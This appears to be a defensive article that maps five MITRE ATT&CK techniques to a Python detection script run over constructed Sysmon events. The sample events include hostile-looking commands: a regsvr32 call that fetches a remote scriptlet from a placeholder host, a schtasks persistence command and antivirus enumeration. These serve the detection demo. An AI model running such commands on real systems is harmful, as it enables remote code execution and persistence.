MITRE ATT&CK techniques
The following MITRE ATT&CK techniques describe how this is done.
T1053.005 – Scheduled Task/Job
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence.
T1218.010 – Signed Binary Proxy Execution: Regsvr32
Regsvr32.exe is a Microsoft-signed command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows machines.
T1518.001 – Software Discovery: Security Software Discovery
This technique aims to get a list of installed security software or defensive programs, available on a system or in a cloud environment. The results obtained can be used to shape subsequent attacks.
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
An attacker may bypass User Account Control (UAC) mechanisms to escalate privileges on the system.
T1574.002 – Hijack Execution Flow: DLL Side-Loading
Adversaries may execute their own malicious payloads by side-loading DLLs. This technique involves hijacking a DLL that a legitimate application loads.
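The five techniques above are what a SIEM dashboard would need rules for. As an added example (not code from this article or from any vendor product), the detector below runs one rule per technique over constructed Sysmon-style events: Event ID 1 (process create) and Event ID 7 (image load). Field names follow Sysmon, but the event values, process GUIDs, the 203.0.113.10 placeholder host and the rule thresholds are all made up for the demonstration. The UAC rule is a heuristic that correlates a child's integrity level with its parent's; the others are stateless command-line and path checks.

```python
"""Detection logic for the ATT&CK techniques listed above, applied to
constructed Sysmon-style events (EventID 1 = process create, 7 = image load).
Added example; field names follow Sysmon, every value below is made up."""
import re

# Directories a standard user can write to; payloads staged here are a common signal.
USER_WRITABLE = re.compile(r"\\(Users\\Public|AppData|Temp|ProgramData)\\", re.IGNORECASE)
# regsvr32 fetching a remote scriptlet or loading the scriptlet host instead of a COM DLL.
REGSVR32_SUSPICIOUS = re.compile(r"/i:\s*https?://|\.sct\b|scrobj\.dll", re.IGNORECASE)
# Command lines that enumerate installed AV/EDR products.
SECURITY_ENUM = re.compile(r"SecurityCenter2|AntiVirusProduct|Get-MpComputerStatus", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dirname(path):
    return path.rsplit("\\", 1)[0].lower()


class Detector:
    """Keeps the integrity level of every process seen so far, so the UAC rule
    can compare a child with its parent across events."""

    def __init__(self):
        self.integrity = {}  # ProcessGuid -> IntegrityLevel

    def process_create(self, ev):
        hits = []
        image, cmd = _basename(ev["Image"]), ev.get("CommandLine", "")
        self.integrity[ev["ProcessGuid"]] = ev.get("IntegrityLevel", "Medium")

        # T1053.005: task registered whose action is staged in a user-writable directory.
        if image == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
            hits.append("T1053.005")
        # T1218.010: regsvr32 pointed at a remote scriptlet or at scrobj.dll.
        if image == "regsvr32.exe" and REGSVR32_SUSPICIOUS.search(cmd):
            hits.append("T1218.010")
        # T1518.001: enumeration of security products.
        if SECURITY_ENUM.search(cmd):
            hits.append("T1518.001")
        # T1548.002 (heuristic): a High-integrity child whose direct parent ran at Medium.
        # A consented elevation is parented by the AppInfo svchost, not by the requester,
        # so a Medium process spawning a High one directly deserves a look.
        parent = self.integrity.get(ev.get("ParentProcessGuid"))
        if ev.get("IntegrityLevel") == "High" and parent == "Medium":
            hits.append("T1548.002")
        return hits

    def image_load(self, ev):
        hits = []
        # T1574.002: an unsigned DLL loaded from a user-writable directory that also
        # holds the loading executable (the classic side-loading layout).
        loaded = ev["ImageLoaded"]
        same_dir = _dirname(loaded) == _dirname(ev["Image"])
        if ev.get("Signed", "true").lower() == "false" and USER_WRITABLE.search(loaded) and same_dir:
            hits.append("T1574.002")
        return hits

    def run(self, events):
        """Return {technique_id: [indexes of matching events]}."""
        matches = {}
        for i, ev in enumerate(events):
            hits = self.process_create(ev) if ev["EventID"] == 1 else self.image_load(ev)
            for technique in hits:
                matches.setdefault(technique, []).append(i)
        return matches


# Constructed sample telemetry; GUIDs are shortened and the host is an RFC 5737 placeholder.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "p1", "ParentProcessGuid": "p0", "IntegrityLevel": "Medium",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessGuid": "p2", "ParentProcessGuid": "p1", "IntegrityLevel": "Medium",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn Updater /tr "C:\Users\Public\svc.exe"'},
    {"EventID": 1, "ProcessGuid": "p3", "ParentProcessGuid": "p1", "IntegrityLevel": "Medium",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"EventID": 1, "ProcessGuid": "p4", "ParentProcessGuid": "p9", "IntegrityLevel": "High",
     "Image": r"C:\Windows\System32\regsvr32.exe",  # benign installer use, must not fire
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
    {"EventID": 1, "ProcessGuid": "p5", "ParentProcessGuid": "p1", "IntegrityLevel": "Medium",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"EventID": 1, "ProcessGuid": "p6", "ParentProcessGuid": "p1", "IntegrityLevel": "High",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\vendor.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\version.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for technique, idx in sorted(Detector().run(SAMPLE_EVENTS).items()):
        print(technique, "matched events", idx)
```

Each rule is deliberately narrow so that the benign regsvr32 call in event 3 does not fire; in a real dashboard the regexes would be tuned against the estate's own baseline, and the UAC heuristic needs the full process tree rather than the small GUID map kept here.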
Figure: example of a SIEM dashboard for MITRE ATT&CK